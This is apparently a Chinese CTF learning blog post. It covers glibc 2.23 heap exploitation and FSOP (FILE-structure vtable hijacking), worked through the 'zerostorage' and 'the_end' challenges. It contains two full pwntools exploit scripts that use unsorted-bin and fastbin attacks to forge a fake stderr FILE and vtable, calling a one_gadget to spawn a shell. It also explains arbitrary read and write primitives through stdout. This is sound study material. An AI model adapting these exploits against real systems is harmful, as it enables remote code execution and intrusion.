由于这种题是第一次接触,自己也还傻傻不清楚unsortedbin attack怎么用,所以参考了一些师傅们的题解,然后发现这种方法可以用来修改global_max_fast这个变量,然而在我参考的过程中发现,由于原题环境是在ubuntu14系统下,当时还存在一个获取libc地址之后直接获取程序地址的操作,所以原题的思路是在bss段伪造一个堆块,然后把bss给malloc出来,获得mask之后修改指针实现任意地址写。但是在ubuntu16下面这个操作已经不存在了,所以又照着新解学习了很多_IO_FILE的知识

学了FSOP再来分析漏洞,此时已经有了libc地址和heap地址,还更改了global_max_fast,接下来如果使用FSOP的话应该怎么用呢…我第一个想到的还是fastbin attack(写完第一个思路之后回来发现师傅还有一个思路,简直不能再爽23333,所以我这里写了两个解法),之前fastbin attack能修改__malloc_hook主要是因为存在0x7f这个特殊值,但是现在就似乎变得更棘手了一些堆块又不能大于0x1000,又不能小于0x80

….不过果然只要细心一点找还是找的到fake size的,如图

我在stderr对应的FILE中找到了一个0xfb的fakesize,这个本来是FILE的flag值,但是既然你有个0xfb我就不客气的拿下了….distance也是足够的,只要劫持你到我堆上伪造的vtable就完事了

Exploit1

接着上面的想法我成功的跑通了自己的思路奥利给!(还是那句话,用自己的方法写出来真的太开心了23333)

  1. 首先就是先多申请几个chunk,其中一个大小是0x74
  2. merge 0x74的chunk,这时候能merge出来一个0xf0的chunk
  3. 再弄一个merge自己的chunk,此时在unsortedbin链中这个chunk的fd是我们之前0xf0的chunk,bk是unsortedbin,达到leak,而且由于这个chunk是unsortedbin链头,所以这个也刚好用来改global_max_fast
  4. 然后把0xf0的chunk从unsortedbin calloc出来,为了后面的fastbin attack(毕竟是UAF的chunk,我们有两个记录可以用来改它2333)
  5. 把第三步merge自己的chunk也calloc出来,这步只是为了改global_max_fast
  6. delete之前的0xf0的chunk,然后改fd(fastbin attack)
  7. 这里注意再insert的时候就可以把fake vtable放上去了,为了等下用
  8. 再insert就是改写_IO_2_1_stderr_的东西了,注意计算对应于fakechunk的偏移
  9. 退出getshell

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './zerostorage' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
g_m_f=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log ``what`` followed by ``address`` in hex, wrapped in ANSI bold-cyan escapes."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
#todo here
def insert(size,content):
    """Drive menu choice '1': send the entry length, then the raw data.

    ``content`` is sent with send(), so no trailing newline is appended.
    """
    p.recvuntil('Your choice: ')
    p.sendline('1')
    p.recvuntil('Length of new entry: ')
    p.sendline(str(size))
    p.recvuntil('Enter your data: ')
    p.send(content)
def update(id,size,content):
    """Drive menu choice '2': send the entry ID, the new length, then the raw data.

    ``content`` is sent with send(), so no trailing newline is appended.
    """
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
    p.recvuntil("Length of entry: ")
    p.sendline(str(size))
    p.recvuntil('Enter your data: ')
    p.send(content)
def merge(fromid,toid):
    """Drive menu choice '3': send the source entry ID, then the destination entry ID."""
    p.recvuntil('Your choice: ')
    p.sendline('3')
    p.recvuntil('from Entry ID: ')
    p.sendline(str(fromid))
    p.recvuntil('to Entry ID: ')
    p.sendline(str(toid))
def delete(id):
    """Drive menu choice '4': answer the 'Entry ID: ' prompt with ``id``."""
    p.recvuntil('Your choice: ')
    p.sendline('4')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
def view(id):
    """Drive menu choice '5' for ``id``; the caller reads the program's reply."""
    p.recvuntil('Your choice: ')
    p.sendline('5')
    p.recvuntil('Entry ID: ')
    p.sendline(str(id))
# Stage 1: heap layout. Merging an entry with itself leaves a record that still
# points at a freed chunk (use-after-free).
insert(0x80,'a'*0x80)#0
insert(0x80,'b'*0x80)#1
insert(0x80,'c'*0x80)#2
insert(0x74,'d'*0x74)#3 sized so that merging it with itself yields a chunk with a 0xfx size, used later
insert(0x80,'e'*0x80)#4
insert(0x80,'f'*0x80)#5

delete(4)#without deleting 4 first, the realloc inside merge frees this space and it gets double freed
merge(3,3)
delete(1)
merge(0,0)

# Stage 2: leak. The first 8 bytes read give the heap base, the next 8 the libc base.
view(1)
p.recvuntil(':\n')
heap_base=my_u64(p.recv(8))-0x1b0
libc_base=my_u64(p.recv(8))-0x3c4b78
loginfo('heap_base',heap_base)

fakechunk_offset=0x3c553b
pad_len=0xcd#distance to the vtable pointer


# Stage 3: unsorted bin attack. bk = global_max_fast - 0x10; the two inserts
# below take the chunks out of the unsorted bin.
update(1,0x110,p64(0)+p64(libc_base+g_m_f-0x10)+'a'*0x100)
insert(0xe0,'+'*0xe0)
insert(0x110,'*'*0x110)

# Stage 4: fastbin attack. Free the 0xf0 chunk, then rewrite its fd through the
# dangling record so that it points at the fake chunk inside libc.
delete(0)
update(4,0xe8,p64(libc_base+fakechunk_offset)+'0'*0xe0)
# this chunk holds the fake vtable: three null qwords, then the one_gadget at 0x4526a
insert(0xe0,p64(0)*3+p64(libc_base+0x4526a)+'.'*0xc0)

#all offsets below are relative to the fake chunk, which makes them a bit fiddly
payload='.'*0x15+p64(0)+p64(1) #satisfy _IO_write_ptr (offset 0x28) > _IO_write_base (offset 0x20)
payload=payload.ljust(pad_len,'\x00') #satisfy _mode (offset 0xc0) <= 0
insert(0xe0,(payload+p64(heap_base+0x1c0)).ljust(0xe0,'\xee'))

p.sendline('7')#trigger
p.interactive()

Exploit2

修改global_max_fast之后我本来是只想到了利用fastbin attack,但是发现好像有一个更牛逼的操作:

因为fastbin的限制现在变的特别大了,所以如果我们的chunk足够大的时候可以直接将chunk的地址填到别的地方去而不是fastbin的那个数组…这应该也算是数组越界的一个应用了,太顶了
如下(这是main_arena之后的可写数据段,一下就看到了一些熟悉的东西,而且指不定还有什么可以改,只要咱们的chunk够大2333):

师傅们的操作是改了_IO_list_all,然后在对应chunk上伪造一个FILE,这里说一下写EXP自己踩的几个坑

  1. leak的时候unsortedbin上是有两个chunk的,所以干脆把链尾的那个chunk弄成0x400后面merge的时候可以直接取下来,省去了再insert的步骤,然后把fake_err和fake table都update到0x1000的那个chunk里面去
  2. 前面0x1000的chunk和0x400的chunk直接挨着就好
  3. _IO_list_all指向的是chunk header,但是我们写的时候是从data段开始写的,所以要注意这里少0x10个偏移,前面0x10的数据也用不了

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# Path of the target binary; also used to configure pwntools' context.
binary = './zerostorage' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
# Start the target locally, with PTYs attached to its stdin and stdout.
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Right-pad the input with NUL bytes to 8 / 4 bytes, then unpack it as an integer.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
# NOTE(review): presumably the libc offset of global_max_fast (used below as
# libc_base+g_m_f) - confirm against the libc in use.
g_m_f=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log a labelled address through pwntools' `log.info`.

    The message is `what`, the literal '----->' and hex(address), wrapped
    in an ANSI colour escape sequence and the matching reset sequence.
    """
    prefix, suffix = "\033[1;36m", "\033[0m"
    log.info(prefix + what + '----->' + hex(address) + suffix)

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
#todo here
def insert(size,content):
    """Drive menu choice '1' to create an entry.

    Answers the 'Length of new entry: ' prompt with str(size) and the
    'Enter your data: ' prompt with `content`; the content is sent raw,
    without an appended newline.
    """
    p.sendlineafter('Your choice: ', '1')
    p.sendlineafter('Length of new entry: ', str(size))
    p.sendafter('Enter your data: ', content)
def update(id,size,content):
    """Drive menu choice '2' to rewrite entry `id`.

    Sends str(id) and str(size) as lines at their prompts, then sends
    `content` raw (no appended newline) at the 'Enter your data: ' prompt.
    """
    p.sendlineafter('Your choice: ', '2')
    p.sendlineafter('Entry ID: ', str(id))
    p.sendlineafter("Length of entry: ", str(size))
    p.sendafter('Enter your data: ', content)
def merge(fromid,toid):
    """Drive menu choice '3', answering the 'from' and 'to' entry-ID prompts."""
    p.sendlineafter('Your choice: ', '3')
    p.sendlineafter('from Entry ID: ', str(fromid))
    p.sendlineafter('to Entry ID: ', str(toid))
def delete(id):
    """Drive menu choice '4' and answer the 'Entry ID: ' prompt with str(id)."""
    p.sendlineafter('Your choice: ', '4')
    p.sendlineafter('Entry ID: ', str(id))
def view(id):
    """Drive menu choice '5' for entry `id`.

    Only the request is sent here; reading the program's reply is left to
    the caller.
    """
    p.sendlineafter('Your choice: ', '5')
    p.sendlineafter('Entry ID: ', str(id))
# Initial layout: six entries; the trailing #N on each line is the entry ID.
insert(0x80,'a'*0x80)#0
insert(0x80,'b'*0x80)#1
insert(0x1000,'d'*0x1000)#2
insert(0x3f0,'e'*0x3f0)#3
insert(0x3f0,'f'*0x3f0)#4
insert(0x80,'g'*0x80)#5

delete(3)#delete for leak&merge

delete(1)#delete for merge
merge(0,0)
view(1)#leak

# The two 8-byte values read after ':\n' are rebased with the author's
# measured offsets to obtain the heap and libc base addresses.
heap_off=-0x1130
libc_off=-0x3c4b78
p.recvuntil(':\n')
heap_base=heap_off+u64(p.recv(8))
libc_base=libc_off+u64(p.recv(8))
loginfo("heapbase",heap_base)
loginfo("libcbase",libc_base)

# Fake FILE image. The first 0x10 bytes are padding, then fields are laid out
# qword by qword; a zero is placed at 0xc0 and heap_base+0x200 at 0xc8.
fake_err=''.ljust(0x10,'\x00')+p64(0)+p64(16)+p64(0)*7#offset-0x10 because '_IO_list_all' will point to the chunk header
fake_err+=p64(libc_base+0x3c5620)+p64(2)+p64(0xffffffffffffffff)+p64(0)+p64(libc_base+0x3c6770)
fake_err=fake_err.ljust(0xc0,'\x00')+p64(0)
fake_err=fake_err.ljust(0xc8,'\x00')+p64(heap_base+0x200)

# Fake jump table: three zero qwords, then libc_base+0x4526a in the fourth
# slot (0x4526a is one of the gadget offsets listed in the string literal above).
fake_table=p64(0)*3+p64(libc_base+0x4526a)


update(2,0x1000,(fake_err+fake_table).ljust(0x1000,'\x00'))#update to fake err FILE

merge(4,2)#merge to 0x1410 and unsortedbin have only one chunk now because of the UNLINK

update(1,0x100,p64(0)+p64(libc_base+g_m_f-0x10)+'2'*0xf0)#update for next insert to change global_max_fast

insert(0x110,'\x33'*0x110)#change global_max_fast

delete(0)#delete 0x1410chunk

# Menu choice '7' is sent last; NOTE(review): presumably the exit option that
# triggers the stream flush walk - confirm against the binary.
p.sendline('7')


p.interactive()

FSOP学习

由于刷how2heap时碰到了一题zerostorage,这个题在ubuntu14上由于存在一个offset2lib的攻击,所以在泄露libc地址之后可以get到程序的地址,但是我复现这个题是在ubuntu16下面做的,所以这个攻击方法无效XD,得另寻他路,所以我找到了raycp师傅的这篇文章,上面提到了FSOP这个攻击姿势,理所当然我当然要啃一啃了,顺带借助了一下CTFwiki和师傅的另一篇博客

FILE *

首先来看一下FILE这个结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
/*
 * Stream bookkeeping structure quoted from glibc's libio.
 * NOTE(review): the excerpt stops right after the `#ifdef
 * _IO_USE_OLD_IO_FILE` line, so no matching #endif appears here and any
 * members that follow in the real header are not shown.
 */
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */

struct _IO_marker *_markers;

/* Pointer to another _IO_FILE; streams are chained through this member. */
struct _IO_FILE *_chain;

int _fileno;/* file descriptor */
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */

#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];

/* char* _save_gptr; char* _save_egptr; */

_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

_IO_FILE_plus&_IO_jump_t

还有FILE结构体的封装和vtable,当然最最主要的就是这个指针和这个table了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
 * Wrapper that places a jump-table pointer directly after the _IO_FILE
 * member, so `vtable` sits at offset sizeof(_IO_FILE) from the start.
 */
struct _IO_FILE_plus
{
_IO_FILE file;
const struct _IO_jump_t *vtable; /* table of per-stream handler slots */
};
/*
 * Jump table referenced by _IO_FILE_plus::vtable: two size_t dummy slots
 * followed by one handler slot per stream operation, each declared through
 * the JUMP_FIELD macro (its expansion is not shown in this excerpt).
 * Slot order: __finish is the third entry and __overflow the fourth.
 */
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
get_column;
set_column;
#endif
};

调用链

table中对应函数的调用姿势会尝试着慢慢更新的,现在菜鸡学到的有这几种:

  1. 利用的是在程序调用 exit 后,会遍历 _IO_list_all ,调用 _IO_2_1_stdout_ 的 vtable 中的 _setbuf 函数(wiki)

  2. puts 在源码中实现的函数是_IO_puts,这个函数的操作与 fwrite 的流程大致相同,函数内部同样会调用 vtable 中的_IO_sputn,结果会执行_IO_new_file_xsputn,最后会调用到系统接口 write 函数。(wiki)

  3. printf 调用栈(wiki):

    1
    2
    3
    4
    5
    6
    vfprintf+11
    _IO_file_xsputn
    _IO_file_overflow
    funlockfile
    _IO_file_write
    write

    自己试出来的几种,有些不同都是得自己去看源码啊(跪),好像和上面比起来没有看到那个overflow:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    ► f 0     7ffff7b042b0 write(没有setbuf,输出结尾有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a87409 _IO_do_write+121
    f 3 7ffff7a87409 _IO_do_write+121
    f 4 7ffff7a8647d _IO_file_xsputn+669
    f 5 7ffff7a5a92d vfprintf+1981
    f 6 7ffff7a62899 printf+153
    f 7 40053e main+24

    ► f 0 7ffff7b042b0 write()(setbuf(stdout,0),输出结尾有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a8638a _IO_file_xsputn+426
    f 3 7ffff7a8638a _IO_file_xsputn+426
    f 4 7ffff7a5cf94 buffered_vfprintf+308
    f 5 7ffff7a5a32d vfprintf+445
    f 6 7ffff7a62899 printf+153
    f 7 4005e2 main+44

    ► f 0 7ffff7b042b0 write(没有setbuf,输出结尾没有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a87409 _IO_do_write+121
    f 3 7ffff7a87409 _IO_do_write+121
    f 4 7ffff7a89196 _IO_flush_all_lockp+374
    f 5 7ffff7a8932a _IO_cleanup+26
    f 6 7ffff7a46f9b __run_exit_handlers+139
    f 7 7ffff7a47045
    f 8 7ffff7a2d837 __libc_start_main+247

    ► f 0 7ffff7b042b0 write(setbuf(stdout,0),输出结尾没有换行)
    f 1 7ffff7a85bff _IO_file_write+143
    f 2 7ffff7a8638a _IO_file_xsputn+426
    f 3 7ffff7a8638a _IO_file_xsputn+426
    f 4 7ffff7a5cf94 buffered_vfprintf+308
    f 5 7ffff7a5a32d vfprintf+445
    f 6 7ffff7a62899 printf+153
    f 7 4005e2 main+44
  4. exit->__run_exit_handlers->_IO_cleanup->_IO_flush_all_lockp
    控制stdin、stdout或者stderr,使其满足fp->_mode <= 0以及fp->_IO_write_ptr > fp->_IO_write_base,同时把vtable里面的_IO_OVERFLOW(即__overflow项)修改为one gadget(来自raycp师傅的博客)

  5. 程序结束时在_dl_fini中会通过__rtld_lock_lock_recursive宏调用_rtld_global结构体里的_dl_rtld_lock_recursive函数指针(来自raycp师傅的博客),准确来说这个不算FILE里面的,不过还是写一下记一下比较好

自己的调试代码

调试之前写了一个有0x40个a的test.txt(用python -c写进去的,因为无论用vim还是gedit好像都会在保存时自动加一个换行符,比较搞,用cat test.txt|hd就可以看到结尾是不是有换行符)

然后用下面的代码调试了一下…调试细节先放着,这个是帮我用来探索前面几个指针是怎么用的,还有很多细节其实都不太清楚,以后玩源码的时候再来看(结果写题的时候就发现直接用gdb p一下那个符号好像更明确….我佛了,不行就加上(_IO_FILE_plus *)转换一下地址的类型,这样看来代码写的好像多余了2333333)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Dump the bookkeeping fields of a glibc FILE object, plus the pointer stored
 * immediately after it, to stderr.
 *
 * tmp: stream to inspect; a NULL pointer is reported and skipped.
 *
 * Members are read through the FILE pointer itself. The earlier approach of
 * squeezing the address into an `unsigned int` drops the upper half of a
 * 64-bit pointer and faults as soon as the object lives above 4 GiB.
 */
void printFILE(FILE * tmp)
{
    void *vtable = NULL;

    if (tmp == NULL) {
        fprintf(stderr, "printFILE: NULL FILE pointer\n\n");
        return;
    }

    fprintf(stderr, "_flags:%#x\n", (unsigned int)tmp->_flags);
    fprintf(stderr, "_IO_read_ptr:%p\n", (void *)tmp->_IO_read_ptr);
    fprintf(stderr, "_IO_read_end:%p\n", (void *)tmp->_IO_read_end);
    fprintf(stderr, "_IO_read_base:%p\n", (void *)tmp->_IO_read_base);
    fprintf(stderr, "_IO_write_base:%p\n", (void *)tmp->_IO_write_base);
    fprintf(stderr, "_IO_write_ptr:%p\n", (void *)tmp->_IO_write_ptr);
    fprintf(stderr, "_IO_write_end:%p\n", (void *)tmp->_IO_write_end);
    fprintf(stderr, "_IO_buf_base:%p\n", (void *)tmp->_IO_buf_base);
    fprintf(stderr, "_IO_buf_end:%p\n", (void *)tmp->_IO_buf_end);
    fprintf(stderr, "_IO_save_base:%p\n", (void *)tmp->_IO_save_base);
    fprintf(stderr, "_IO_backup_base:%p\n", (void *)tmp->_IO_backup_base);
    fprintf(stderr, "_IO_save_end:%p\n", (void *)tmp->_IO_save_end);
    fprintf(stderr, "_markers:%p\n", (void *)tmp->_markers);
    fprintf(stderr, "_chain:%p\n", (void *)tmp->_chain);
    fprintf(stderr, "_fileno:%#x\n", (unsigned int)tmp->_fileno);
    fprintf(stderr, "_flags2:%#x\n", (unsigned int)tmp->_flags2);
    /* The offset type is wider than int, so print it as a long. */
    fprintf(stderr, "_old_offset:%#lx\n", (unsigned long)tmp->_old_offset);
    fprintf(stderr, "_cur_column:%#x\n", (unsigned int)tmp->_cur_column);
    fprintf(stderr, "_vtable_offset:%#x\n", (unsigned int)tmp->_vtable_offset);
    fprintf(stderr, "_shortbuf:%#x\n", (unsigned int)tmp->_shortbuf[0]);
    /* Print the whole lock pointer rather than only its low 32 bits. */
    fprintf(stderr, "_lock:%p\n\n", (void *)tmp->_lock);

    /*
     * The jump-table pointer is not a member of FILE; it is fetched from the
     * pointer-sized slot right after the structure, which matches the
     * _IO_FILE_plus layout quoted in this post.
     * NOTE(review): glibc-specific assumption - only valid for streams that
     * are really embedded in an _IO_FILE_plus.
     */
    memcpy(&vtable, (const char *)tmp + sizeof(*tmp), sizeof vtable);
    fprintf(stderr, "vatable*:%p\n\n", vtable);
}
/*
 * Walk one stream through fopen / fread / fwrite / fflush / fclose on
 * "test.txt" and dump its FILE fields with printFILE() after every step.
 *
 * Returns 0 after the full sequence, or 1 when "test.txt" cannot be opened.
 */
int main(){
    fprintf(stderr, "Let's see what FILE* have(x64):\n");
    fprintf(stderr, "The fopen will malloc a chunk to store the FILE structure and return a ptr to the structure chunk\n");
    fprintf(stderr, "Let's do fopen\n");
    FILE *f=fopen("test.txt","r+");
    if (f == NULL) {
        /* Without the input file every later step would dereference NULL. */
        perror("fopen(test.txt)");
        return 1;
    }
    fprintf(stderr, "And we can see what exactly the structure have at the beginning:\n");
    printFILE(f);

    fprintf(stderr, "Then we read something from the file(0x20)\n");
    char buffer[0x30]={0};
    fread(buffer,1,0x20,f);
    /* strlen() yields size_t, so the conversion needs the z length modifier. */
    fprintf(stderr, "buffer<%s><%#zx>\n",buffer,strlen(buffer));
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    /*
     * NOTE(review): ISO C asks for a positioning call between a read and a
     * following write on an update stream unless the read hit end-of-file.
     * The sequence is kept as written because the point of this program is
     * to observe the stream's pointers across exactly these calls.
     */
    memset(buffer,0,0x30);
    strcpy(buffer,"bbbbbbbbbbbbbbbb");
    fprintf(stderr, "Then we write something to the file('b'*0x10)\n");
    fwrite(buffer,1,strlen(buffer),f);
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    fprintf(stderr, "Try fflush\n");
    fflush(f);
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    memset(buffer,0,0x30);
    fprintf(stderr, "Read again(0x20)\n");
    fread(buffer,1,0x20,f);
    fprintf(stderr, "buffer<%s><%#zx>\n",buffer,strlen(buffer));
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    memset(buffer,'*',0x30);
    fprintf(stderr, "Write again('*'*0x20)\n");
    fwrite(buffer,1,0x20,f);
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    fflush(f);

    fclose(f);
    /*
     * Deliberate use-after-free: the closed stream is inspected on purpose
     * to show what is left behind. This is undefined behaviour and exists
     * only for the demonstration.
     */
    fprintf(stderr, "Now the FILE looks like(Use after free):\n");
    printFILE(f);
    return 0;
}

其中最主要的大概是fopen时malloc了一个0x230的chunk来存放结构体,然后第一次调用fread时分配了一个0x1000的文件缓冲区,第一次会把文件的全部内容都读到这个缓冲区里面(正确与否有待深究,自己看来暂时是这样)

1582612886398

_chain域的链接此时结构大概是:_IO_list_all->f->_IO_2_1_stderr_->_IO_2_1_stdout_->_IO_2_1_stdin_->NULL

其中_IO_list_all是一个变量,存储着指向f结构体的指针(以上图为例就是0x603010),f在fopen操作时初始化的FILE*就被链入了这个链表

再就是fclose会直接把对应的两个chunk一起释放了,释放顺序是先释放文件缓冲区再释放结构体chunk

Hijack

至于vtable在_IO_FILE_plus中的偏移量,摘自wiki就是:在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8(wiki)

如果我们伪造一个vtable,然后修改对应FILE结构体的vtable指针指向我们伪造的vtable,就可以达到劫持程序的目的(不得不说vtable大法好啊23333)

目前 libc2.23 版本下,位于 libc 数据段的 vtable 是不可以进行写入的。不过,通过在可控的内存中伪造 vtable 的方法依然可以实现利用(wiki)

vtable对应的段属性如下所示,位于不可写段:

1582618757197

(wiki上面关于修改vtable的描述已经很详细了,这里不再赘述,主要是以记笔记为主)

因为 vtable 中的函数调用时会把对应的_IO_FILE_plus指针作为第一个参数传递,因此这里我们把 “sh” 写入_IO_FILE_plus 头部。之后对 fwrite 的调用就会经过我们伪造的 vtable 执行 system(“sh”)
(或者直接试着填one_gadget)

leak

(来自raycp师傅的博客)

控制stdout结构体满足以下条件实现任意泄露:

  • _IO_write_base指向想要泄露的地方。
  • _IO_write_ptr指向泄露结束的地址。
  • _IO_read_end等于_IO_write_base以绕过多余的代码。 满足这三个条件,可实现任意读。当然不包含结构体里的_flags字段的伪造,该字段都从原来的结构体里面复制过来,所以就没去分析该如何构造了。

Arbitrary write

(来自raycp师傅的博客)

_IO_write_end 大于_IO_write_ptr时,memcpy就会调用

只需要将_IO_write_ptr指向需要写的地址,_IO_write_end指向结束位置即可

有了任意读与任意写之后,具体实现就是使用任意读泄露libc地址,然后用任意写将one gadget写到malloc_hook中,然后利用%n报错或者是较大的字符打印来触发malloc函数

the_end

只看概念当然不代表会用了,肯定要写个题印象才深23333

程序分析

1582615573201

程序逻辑非常简单,就是给了一个libc地址,然后任意地址写5次,一次一字节,但是程序开启了PIE和Full RELRO,无法改写程序段的内容,这里我由于是第一次写FILE类型的题,所以就参考了师傅们的WP学了很多(看完的感触就是挖洞果然撸源码是王道啊….)

当然还有从各路师傅那听来的Ex师傅的博客,真的学到了不少东西

Exploit1

第一种办法是修改stdin/stdout/stderr任一FILE的vtable指针指向我们可控的区域,由于ubuntu libc2.23存放vtable的段不可写,所以不能直接改vtable。改指针的时候也特别巧妙,改的是指针第二个字节,所以可以在可写的段再去找合适的偏移,当然这里的解法都是参考raycp师傅学的新姿势,所以更清晰明了的解释就推荐去看原博主的文了

这个方法里面一共改了三处,5次:
第一处:stdin/stdout/stderr任一FILE的 _IO_write_ptr,使其大于_IO_write_base
第二处:对应vtable指针第二字节,改写的地址对应偏移需要有libc地址
第三处:对应偏移处有libc地址,修改低三字节

可能自己接触比较新的就是在libc找合适的地方去改地址
我用的命令是 search -p 0x7fxxxx -w,在GDB里面可以直接找到可写的而且有这个地址的内存,然后通过我们需要的偏移比对哪个地址是我们需要的,因为vtable里面是存在偏移的,如果实在是找不到可能就失败了,当然找到的概率还是很大的,毕竟师傅们的利用都这么多了XD

ps:原来这个就是FSOP,开始还以为FSOP是更深一点的知识,然后点开wiki的FSOP之后发现就是这个23333,一举两得?

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# Path of the target binary; also used to configure pwntools' context.
binary = './the_end' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
# Start the target locally, with PTYs attached to its stdin and stdout.
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Right-pad the input with NUL bytes to 8 / 4 bytes, then unpack it as an integer.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
